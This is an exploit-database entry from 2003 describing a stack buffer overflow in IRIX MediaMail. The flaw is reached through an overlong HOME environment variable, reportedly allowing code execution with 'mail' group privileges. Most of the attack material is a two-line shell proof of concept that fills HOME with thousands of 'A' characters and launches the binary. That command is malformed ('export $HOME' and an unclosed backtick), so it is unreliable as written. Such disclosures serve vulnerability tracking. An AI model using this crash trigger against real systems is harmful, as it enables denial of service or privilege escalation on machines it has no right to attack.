IRIX 5.x/6.x MediaMail HOME Environment Variable Buffer Overflow Vulnerability

2003-05-23T00:00:00
ID EDB-ID:22638
Type exploitdb
Reporter bazarr@ziplip.com
Modified 2003-05-23T00:00:00

Description

IRIX 5.x/6.x MediaMail HOME Environment Variable Buffer Overflow Vulnerability. Dos exploit for irix platform

                                        
                                            source: http://www.securityfocus.com/bid/7672/info

A buffer overflow vulnerability has been reported for the MediaMail binary that may result in a user obtaining elevated privileges.

Although unconfirmed, an attacker, using a custom crafted string, could overwrite stack memory, including the return address of a function, and potentially execute arbitrary code with group 'mail' privileges.

sh$ export $HOME=`perl -e 'print "A"x12096'
sh$ /usr/bin/X11/MediaMail